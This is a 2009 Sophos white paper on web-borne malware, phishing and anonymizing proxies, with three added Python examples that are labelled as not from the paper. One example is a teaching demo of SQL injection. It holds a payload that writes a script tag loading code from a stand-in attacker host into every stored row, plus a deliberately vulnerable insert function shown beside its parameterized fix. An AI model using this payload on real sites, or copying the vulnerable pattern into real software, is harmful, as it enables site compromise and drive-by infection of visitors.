
Enabling a safer internet: The positive approach to web security

With one new infected webpage discovered every 4.5 seconds, there is no longer any such thing as a “trusted website”. As the internet becomes an increasingly mission-critical tool, new media such as blogs and social networking sites are a necessary part of business. This paper describes today’s new web threats, highlights the need for a positive security model to replace yesterday’s access-blocking approach, and describes the three pillars of protection organizations need to safeguard their systems and resources.

A Sophos white paper

April 2009

Web-based malware: the new weapon

With one new web page infected every 4.5 seconds,[1] the web is now the number one vector of attack for cybercriminals. Taking advantage of web infrastructure vulnerabilities, particularly the ever-increasing capability for user-submitted content, hackers are able to covertly inject malicious code into more and more legitimate sites. This web-based malware is then able to exploit social engineering tactics or browser vulnerabilities to infect visitors, the intention being to surreptitiously steal confidential information directly, install further malicious code or, worse, silently recruit the host system into a botnet – a network of hijacked computers for distributing further malware, spyware, or spam. Thousands of systems are infected in this way every day and the activity is particularly lucrative for the criminals – a single compromised computer can give access to thousands of confidential records.

This significant security risk can be extremely costly to businesses. In addition to significant security and financial risks, organizations are having to deal with the legal implications of security breaches, with some estimates putting the cost of a single data breach at millions, and even billions, of dollars.[2]

At the same time, uncontrolled web browsing can have serious productivity implications, with unauthorized surfing potentially causing network slowdown, staff inefficiency and further security (and legal) risk if sensitive company or personal data is posted online. Organizations can be legally liable if their computers are used to view pornography or hate material or to incite illegal behavior. There are also ramifications if users violate third-party licenses through illegal MP3, film and software downloads.

Exploiting legitimate, trusted brands

Hackers don’t tend to discriminate between websites. The only criterion is that the website has vulnerabilities that the hacker can exploit. Large, more established brands with high traffic volumes are very attractive to cybercriminals, but smaller organizations are equally likely to fall victim. The techniques used continue to evolve rapidly and this paper now looks at what the hackers are up to today.

Infecting trusted sites with SQL injection attacks

One of the main threats comes from SQL injection attacks. Such attacks exploit security vulnerabilities and insert malicious code (in this case script tags) into the database running a site. When user input, for instance via a web form, is not correctly filtered or checked, the code peppers the database with malicious instructions. Recovery from a SQL injection attack can be difficult, and there are numerous cases of website owners cleaning up their database only to be hit again a few hours later.

Websites that have been attacked in this way include:
• BusinessWeek magazine – one of the 1000 busiest websites – which attempted to download malware from a Russian-based server.[3]
• An area of the Adobe website designed to offer support to video bloggers, putting visitors at risk from a scareware attack.[4]
• Sony’s US PlayStation website, which tried to download spyware.[5]

New gateways for cybercrime

The new freedoms opened up by the web, blurring the lines between work and social interaction and offering easy ways to share information, have opened up new loopholes for cybercriminals to exploit.

Social networking sites

A favorite target for today’s hackers are social networking websites. People who have learned to be suspicious of email links are on the whole less savvy about links posted on Facebook and the like.[8] Hackers have found value in compromising Facebook accounts, stealing usernames and passwords, and then using the profiles as a launching pad for mass-distributing malware attacks and spam.[6] In August 2008, Facebook admitted that up to 1800 users had had their profiles defaced by an attack that secretly installed a Trojan while displaying an animated graphic of a court jester blowing a raspberry.[7]

One particularly active threat is Koobface, a family of worms,[9] and its rapid evolution demonstrates the wide range of social networks that are vulnerable. Initially targeting Facebook and MySpace, Koobface now targets a more diverse set of social networks, including MySpace, Bebo, GeoCities, hi5, Friendster and Tagged.[10] The malware works by directing your “friends” on your social-networking site to click on a link to another site purporting to contain a video clip. If they are tricked into downloading an executable to watch the video at the third-party website, a message is displayed: “Error installing Codec. Please Contact Support”. The malware then accesses Facebook/MySpace/etc to spread itself further. The websites to which victims are directed use a script to check which of these social networking sites has sent them there. The aim is to serve up malware specifically tailored to the networks of which you’re known to be a member (though in fact to date these links all result in the same executable).

Blogs, micro-blogs and hackers

Hackers are also targeting other social media such as blogs. In much the same way that they set up malicious pages on fake websites and then use social engineering techniques to lure visitors to them, they are using free blogging services to create infected blogs. Unsuspecting victims then receive emails with links to the blog, from which malicious software is downloaded.
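The injection described above, as an added example that is not from the white paper: a comment form whose input is pasted into the SQL text, a stacked UPDATE that writes a script tag into every stored row (which is why a clean-up that only removes the attacker’s own comment does not help), and the parameterized insert plus output encoding that close the hole. The comment table, the attacker host name and the use of SQLite’s executescript() to stand in for a database driver that accepts stacked statements are assumptions of the example.

```python
import html
import sqlite3

# Constructed payload modelled on the attacks the paper describes: it closes the
# quoted value, appends an UPDATE that writes a script tag into every stored row,
# and comments out the remainder of the query. The host name is a placeholder.
INJECTED_TAG = '<script src="http://attacker.example/evil.js"></script>'
PAYLOAD = "x'); UPDATE comments SET body = body || '" + INJECTED_TAG + "'; --"


def new_db():
    """In-memory table standing in for a site's comment store (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE comments (id INTEGER PRIMARY KEY, author TEXT, body TEXT)")
    conn.execute("INSERT INTO comments (author, body) VALUES ('alice', 'First post')")
    conn.execute("INSERT INTO comments (author, body) VALUES ('bob', 'Nice site')")
    conn.commit()
    return conn


def store_comment_vulnerable(conn, author, body):
    """The flaw: form input is pasted into the SQL text. executescript() stands in
    for a driver/DBMS that runs stacked statements, so the injected UPDATE runs too."""
    sql = "INSERT INTO comments (author, body) VALUES ('%s', '%s');" % (author, body)
    conn.executescript(sql)


def store_comment_safe(conn, author, body):
    """The fix: placeholders bind the input as data, never as SQL."""
    conn.execute("INSERT INTO comments (author, body) VALUES (?, ?)", (author, body))
    conn.commit()


def render_comment(body):
    """Second line of defence when rendering: stored tags become inert text."""
    return html.escape(body)


def rows_containing_script(conn):
    """Clean-up/audit query: ids of rows that now carry a script tag."""
    cur = conn.execute("SELECT id FROM comments WHERE body LIKE '%<script%' ORDER BY id")
    return [row[0] for row in cur.fetchall()]


def demo():
    """Push the same payload through both code paths and compare the damage."""
    vuln = new_db()
    store_comment_vulnerable(vuln, "eve", PAYLOAD)
    safe = new_db()
    store_comment_safe(safe, "eve", PAYLOAD)
    return {
        # every existing row was rewritten, not just the attacker's own comment
        "vulnerable_tainted": rows_containing_script(vuln),
        # only the attacker's row holds the text, and it holds it as inert data
        "safe_tainted": rows_containing_script(safe),
        "safe_first_post": safe.execute("SELECT body FROM comments WHERE id = 1").fetchone()[0],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Note that the safe path still stores the attacker’s text verbatim; the parameterized query stops it from being executed as SQL, and html.escape() stops it from being executed by the browser. Both are needed: a site that binds parameters but echoes stored content raw is still open to the script-tag payload by another route.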

Of note is the micro-blogging site, Twitter, which has begun to be targeted. In January 2009, Twitter’s internal systems were hacked and the accounts of Britney Spears, Fox News and Barack Obama, among others, were broken into.[11] Two months later hundreds of Twitter users were hit when messages were sent from compromised accounts trying to drive traffic to a pornographic website.[12] At the same time, vulnerabilities in common legitimate blogging platforms – just like any other platform – can be, and are, exploited by criminals.

The spread of the phishing net

Phishing attacks – whereby unsuspecting users are directed to a bogus login page which requests their username and password – continue to be a significant threat. A common misconception is that phishing is just a banking problem. It remains, of course, a banking problem, but it is now also a problem for social networking sites such as MySpace, Facebook, Bebo and a wide range of other networks and enterprises. A handful of examples from February and March 2009 alone demonstrate the scale of the problem:
• Google: a phishing campaign spread via the Google Talk chat system.[13]
• iStockphoto: a phishing attack was perpetrated across iStockphoto’s online forums and via the site’s mail system.[14]
• HMRC: the passing of the deadline for submitting tax returns to HM Revenue & Customs in the UK prompted a phish.[15]
• Gaming community: the Valve Steam network was targeted by a phish offering add-ons for the new zombie shooter Left 4 Dead.[16]
• Paypal: an unusual type of phishing attack spammed out malware within a RAR attachment.[17]

The risks posed by anonymizing proxies

Many organizations have responded to the growing web threat by using URL filtering to curtail internet browsing. This has motivated many users to respond by using anonymizing proxies, which disguise the true nature of a website in order to trick an organization’s web filter into allowing access. Anonymizing proxies bypass URL filtering and create enormous security vulnerabilities.

Anonymizing proxies are big business in the underground economy, driven by advertising revenues and subscription fees. Hundreds of new anonymizing proxies are created daily and distributed via blogs, forums, and dedicated websites. This makes it extremely easy for users to access any site they want through an anonymizing proxy, but a difficult, tedious, and time-consuming task for administrators to track and block them. There is also a growing number of unknown private anonymizing proxies set up and maintained by individuals or small groups for their own use. There are even anonymizing proxies that are themselves, either accidentally or deliberately, infected with malware, which dramatically increases the chance of infection.

Anonymizing proxies hold significant risks for organizations:
• Security: if users are browsing via anonymizing proxies then, in addition to bypassing URL filtering, they might also be circumnavigating content scanning at the perimeter. Because traffic from these sites is not blocked, malware, whether new or old, will be allowed into an organization.
• Liability: unrestricted access to inappropriate material or illegal downloads could have serious legal ramifications for an organization, as could the sharing of confidential information over the internet.
• Productivity: the ability for users to bypass their organization’s web filter means they could spend all day on, for example, social networking sites rather than working, and consume valuable network bandwidth.

To prevent users from bypassing filtering controls, the following two components are critical in forming a defense against anonymizing proxy use:
• A reputation-based service that actively seeks out new anonymizing proxies as they are published and updates the filtering database at frequent, regular intervals.
• A real-time proxy detection engine that automatically inspects traffic for signs that it’s being routed through a proxy, effectively closing the door on private proxies or other proxies not identified through the reputation service.

The three pillars of modern web protection

Internet access creates a dilemma for network administrators – on the one hand, the risks presented by allowing unfettered access to the web are enormous, yet the internet is undeniably becoming a mission-critical business tool. Social networking sites, blogs, forums and media portals have all become important instruments for employee recruitment, viral marketing, public relations, customer interaction, and research – they cannot be blocked without seriously impacting business productivity and effectiveness. A new approach to web security and control is required that fully supports the needs of business, equipping users with the tools they need to be more effective while eliminating the associated risks of potential infection from trusted legitimate sites.

In addition to good preventive practices, such as rigorous patching and educating users about the risks of browsing, it is vital that organizations implement a comprehensive web security solution, comprising three key pillars of protection:
• Reputation-based filtering
• Real-time predictive malware filtering
• Content-based filtering.

Pillar one: Reputation-based filtering

Reputation-based filters are the first critical component in the fight against web-based threats. They prevent access to a catalog of sites that are known to have hosted malware or other unwanted content, and are an established and proven tool for successfully protecting against already known and located web-based threats. As well as providing this basic form of preventive protection, by filtering URLs based on their reputation as “good” or “bad”, they help optimize network performance and staff productivity by blocking access to illegal, inappropriate or non-business-critical web content.

Although traditional URL filters often connect to vast, regularly updated databases of sites known to host malware or suspicious content, they have several significant shortcomings. In particular, they offer no protection against malware hosted on legitimate, previously safe, sites that have become hijacked. Neither do they protect against malware on newly created websites. Cybercriminals are well aware of, and readily exploit, these gaps. Another significant shortcoming of traditional URL filters is that they often lack an effective solution to deal with the enormous issue of anonymizing proxies.
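The two anonymizing-proxy defenses described earlier (a reputation catalog of known proxies refreshed from a feed, and real-time inspection of each request for signs that it is being tunnelled through a proxy), as an added example that is not from the white paper. The proxy host list, the category database and the policy are constructed; the inspection heuristic, that CGI-style proxies carry the real destination inside the request as a query parameter or path suffix, is an assumption of this example and not a technique the paper states.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed stand-in for the vendor-maintained catalog of known anonymizing
# proxies; a real deployment refreshes this from the reputation feed.
KNOWN_PROXY_HOSTS = {"freeproxy.example", "surf-anon.example"}

# Constructed URL-filtering policy and category database.
BLOCKED_CATEGORIES = {"social-networking", "adult"}
URL_CATEGORIES = {"facebook.com": "social-networking", "news.example": "news"}

# Heuristic for the real-time inspection step (an assumption of this example):
# CGI-style proxies carry the real destination inside the request, either as a
# query parameter or as a path suffix such as /browse.php/http://target/.
PROXY_TARGET_PARAMS = {"u", "url", "q", "target"}
FULL_URL_RE = re.compile(r"^(https?://|www\.)", re.IGNORECASE)


def reputation_verdict(host):
    """Reputation-based check: known proxy first, then category policy.
    Returns a block reason, or None when the host is allowed."""
    if host in KNOWN_PROXY_HOSTS:
        return "known-proxy"
    category = URL_CATEGORIES.get(host)
    if category in BLOCKED_CATEGORIES:
        return "category:" + category
    return None


def embedded_target(url):
    """Real-time inspection: the destination a request is tunnelling to, or None."""
    parts = urlsplit(url)
    for key, values in parse_qs(parts.query).items():
        if key.lower() in PROXY_TARGET_PARAMS:
            for value in values:
                value = unquote(value)
                if FULL_URL_RE.match(value):
                    return value
    match = re.search(r"/(https?://[^\s]+)$", parts.path)
    return unquote(match.group(1)) if match else None


def filter_request(url):
    """Gateway decision for one request: (action, reason)."""
    host = (urlsplit(url).hostname or "").lower()
    reason = reputation_verdict(host)
    if reason:
        return ("block", reason)
    target = embedded_target(url)
    if target:
        # Unlisted (private) proxy: block and record where it was tunnelling to.
        if "://" not in target:
            target = "http://" + target
        tunnelled = (urlsplit(target).hostname or "").lower()
        return ("block", "proxy-detected:" + tunnelled)
    return ("allow", "")


if __name__ == "__main__":
    # Constructed requests: direct, via a listed proxy, via an unlisted proxy.
    for request in (
        "http://news.example/story?id=7",
        "http://freeproxy.example/browse.php?u=http://facebook.com/",
        "http://unlisted.example/browse.php?u=http%3A%2F%2Ffacebook.com%2F",
        "http://unlisted.example/index.php/http://news.example/",
    ):
        print(filter_request(request))
```

The second component matters because the catalog is always behind: the last two requests go to a host the reputation list has never seen, and only the request-level inspection catches them. The heuristic is deliberately narrow (it requires a scheme or a www. prefix before treating a parameter as a tunnelled URL) to keep ordinary search queries from being flagged; a production engine would add checks such as proxy-script path names and encoded targets.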

Key questions to ask a prospective vendor
• Does the URL database used for your reputation-based filtering have global coverage?
• How frequently is your product updated to cover new threats?
• How many new threat-hosting sites are identified daily?
• Do you scan all incoming traffic for malware in real-time?
• Do you use your own technology for malware scanning or rely on third-parties?
• Is your malware scanning engine signature-based or does it use behavioral analysis?
• Is there an additional cost for real-time malware filtering?
• Is there a performance impact for real-time malware filtering?
• How many anonymizing proxies do you catalog daily?
• Does your solution identify anonymizing proxy use in real time?
• Do you analyze the true content of files, or rely on the extension or the MIME-type?
• Do you scan HTTPS-encrypted traffic?
• Can you demonstrate real research expertise in web threats?
• Do you have independent statistics of your proactive web threat detection rates?
• Can I see a demo of the admin console to see how easy it is to use?
• Are there on-board monitors to track software, hardware and traffic health?
• How are issues reported to the administrator? Via email? Via phone call?
• Do you provide real-time uptime monitoring to assure the system is available 24/7?

Pillar two: Real-time predictive malware filtering

Real-time predictive malware filtering goes a long way to closing the gap left by reputation-based filters. All web traffic passes through a scanner designed to identify both known and newly emerging zero-day malware. In addition to detecting known malware as it moves across legitimate sites, this bi-directional filtering can also provide protection against new threats regardless of where they are hosted. The malware engine is optimized for low-latency scanning, and whenever a user accesses a website, irrespective of its reputation or category, the traffic is scanned using a combination of signatures and behavior-based technologies.

It is worth noting that this type of real-time scanning has a further advantage over traditional URL filters, in that the filtering is, almost by definition, bi-directional – both the user request to, and information returning from, the web server are scanned.

The use of real-time predictive threat filtering remains uncommon amongst many of the leading web filtering security solutions in the market today. Many security vendors are currently relying on signatures alone. Others who are fairly recent entrants to the market claim comprehensive solutions but lack the evidence to prove they are delivering fully proactive protection.

Pillar three: Content-based filtering

Content-based filtering analyzes all web traffic on the network to determine the true filetype of content coming back from a website and can allow or disallow this traffic, based on corporate policy.
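The true-filetype check that this pillar rests on, as an added example that is not from the white paper: a classifier that reads the leading bytes of a download (the PE header of a Windows executable or screensaver, and a few other common magic numbers) and applies policy to what the bytes are rather than to the file name or the MIME type the server declared, beside the extension-only check it replaces. The signature table, the policy and the minimal PE stub used as sample input are constructed for the example.

```python
import struct

# Magic-byte signatures for formats a gateway commonly sees (leading bytes -> type).
MAGIC = [
    (b"%PDF-", "pdf"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"PK\x03\x04", "zip"),
    (b"\x7fELF", "elf"),
    (b"Rar!\x1a\x07", "rar"),
    (b"GIF8", "gif"),
    (b"\xff\xd8\xff", "jpeg"),
]

# Constructed policy: block executables and RAR archives whatever they are called.
BLOCKED_TYPES = {"pe-exe", "dos-exe", "elf", "rar"}
BLOCKED_EXTENSIONS = {"exe", "scr", "dll", "com"}


def sniff(data):
    """Identify the true file type from content, ignoring name and MIME type."""
    if data[:2] == b"MZ":
        # Windows executables (.exe, .dll and screensaver .scr alike) start with
        # an MZ stub; e_lfanew at offset 0x3c points to the "PE\0\0" signature.
        if len(data) >= 0x40:
            e_lfanew = struct.unpack_from("<I", data, 0x3c)[0]
            if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
                return "pe-exe"
        return "dos-exe"
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    if data and all(b in b"\t\n\r" or 32 <= b < 127 for b in data):
        return "text"
    return "unknown"


def decide_by_extension(filename):
    """The weak check a traditional filter performs: trust the file name."""
    ext = filename.lower().rsplit(".", 1)[-1]
    action = "block" if ext in BLOCKED_EXTENSIONS else "allow"
    return (action, "extension:" + ext)


def decide_by_content(filename, declared_mime, data):
    """Content-based filtering: the verdict comes from sniff(); a mismatch between
    what the server declared and what the bytes are is reported in the reason."""
    kind = sniff(data)
    if kind in BLOCKED_TYPES:
        return ("block", "%s declared as %s is really %s" % (filename, declared_mime, kind))
    return ("allow", kind)


def make_pe_stub():
    """Constructed minimal PE image for the demo: an MZ header whose e_lfanew
    points at a PE signature. It is not a runnable program."""
    header = bytearray(0x40)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3c, 0x40)
    return bytes(header) + b"PE\x00\x00" + b"\x00" * 20


if __name__ == "__main__":
    # Constructed downloads: an executable served as invoice.txt / text/plain,
    # a genuine text file and a screensaver with an honest name.
    samples = [
        ("invoice.txt", "text/plain", make_pe_stub()),
        ("notes.txt", "text/plain", b"Quarterly figures attached\n"),
        ("holiday.scr", "application/octet-stream", make_pe_stub()),
    ]
    for name, mime, blob in samples:
        print(name, decide_by_extension(name), decide_by_content(name, mime, blob))
```

The invoice.txt case is the one the paper warns about: the extension check waves it through while the content check blocks it, and the reason string records the masquerade so an analyst can see that the server lied about the type. Sniffing only the first bytes keeps the check cheap enough to run inline on every response.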

Content filters scan the actual content of a file, rather than simply looking at the file extension or the MIME-type reported by the web server, and so can identify and block files that are masquerading as innocent/allowed filetypes but really contain unauthorized content. A file might, for example, have a .TXT extension but in fact be an executable file. By enabling enforcement of only business-type content, this pillar of protection enables organizations to create policies around a variety of content types that can be used to send malware, thereby reducing the risks of infection. For example, Windows executables or screensavers might be disallowed. Content-based filtering also improves bandwidth optimization by blocking large or resource-hungry content, such as streaming video.

User education as a tool for defense

Many businesses have successfully educated users about how to spot email-borne threats, but few have updated these to include guidance on how to avoid infection whilst surfing the net. Many firms already have procedures in place that define which websites are considered appropriate, and while the fight against web-based threats relies much more heavily on sophisticated technology, users can and should be engaged in the fight. A good policy will dictate that:
• Employees must never open spam emails
• Employees must never click on links included in emails sent from unknown senders
• IT must ensure that the organization’s web browsers are patched at all times
• Employees should minimize their non-work-related browsing for both security and productivity reasons.

Users can also be encouraged or required to report unusual behavior, such as their computer suddenly becoming slow, the homepage changing when they open their browser with no input from them, or a file they open that appears to do nothing.

Conclusion

Every minute of every day, cybercriminals are looking to exploit web traffic for commercial gain, and since web browsing is integral to most businesses’ day-to-day activities, the web gateway must be equipped with a security solution that enables business and users to be productive while providing the security essential to ensure a risk-free experience. At the same time, end-user expectations and requirements for speed, performance, and open access to the tools and sites they need must be met. Solutions which fail to meet these demands for security, efficiency, control, and accessibility will ultimately fail the organization. Organizations looking to protect against the growing threat of web-based malware need a solution that above all demonstrates its security attributes and combines powerful site and content controls with low-impact, effective administration.

Sophos solution

The Sophos Web Appliance, part of Web Security and Control, blocks spyware, viruses, phishing, malware and unwanted applications at the gateway. It features an innovative, full-spectrum scanning engine that detects all threats through a unique combination of reputation-based filtering, real-time predictive threat filtering, and content-based filtering, searching for and blocking anonymizing proxies, and enabling comprehensive web access control for safe, secure, productive web browsing. Its easy-to-use management console and powerful reporting tools, which deliver rapid insight into web traffic, threats and user behavior, enable secure browsing without the complexity of traditional web filters. As a managed appliance, the Sophos Web Appliance features remote “heartbeat” monitoring and on-demand remote assistance, ensuring it delivers the most dependable web security in the industry. Visit www.sophos.com/products/enterprise/free-trials for a free 30-day trial.

Sources
[1] Sophos security threat report 2009, www.sophos.com/sophos/docs/eng/marketing_material/sophos-security-threat-report-jan-2009-na.pdf
[2] www.sophos.com/threats?chapter=162971949&id=207784708; www.infowatch.com …tr/090320
[3] www.sophos.com/blogs/gc/g/2008/09/15/hackers-infect-businessweek-website-via-sql-injection-attack
[4] www.sophos.com/pressoffice/news/articles/2008/10/adobe-infection.html
[5] www.sophos.com/pressoffice/news/articles/2008/07/playstation.html
[6] www.sophos.com/blogs/gc/g/2008/09/17/facebook-malware-is-a-real-threat
[7] www.sophos.com/blogs/gc/g/2008/08/07/more-malicious-links-seen-on-facebook
[8] www.sophos.com/blogs/gc/g/2008/08/04/facebook-and-myspace-malware
[9] www.sophos.com/security/analyses/viruses-and-spyware/w32koobfagen.html
[10] www.sophos.com/security/blog/2009/02/3215.html
[11] www.sophos.com/blogs/gc/g/2009/01/07/celebrity-twitter-accounts-hacked
[12] www.sophos.com/blogs/gc/g/2009/03/06/chatwebcamfree-attack-hits-twitter-users
[13] www.sophos.com/blogs/gc/g/2009/02/25/gmail-users-hit-viddyho-phishing-chat-attack
[14] www.sophos.com/blogs/gc/g/2009/03/04/istockphoto-struck-phishing-attack
[15] www.sophos.com/security/blog/2009/02/3287.html
[16] www.sophos.com/security/blog/2009/02/3071.html
[17] www.sophos.com/security/blog/2009/02/3426.html

Boston, USA | Oxford, UK
© Copyright 2009. Sophos Plc. All rights reserved. All trademarks are the property of their respective owners.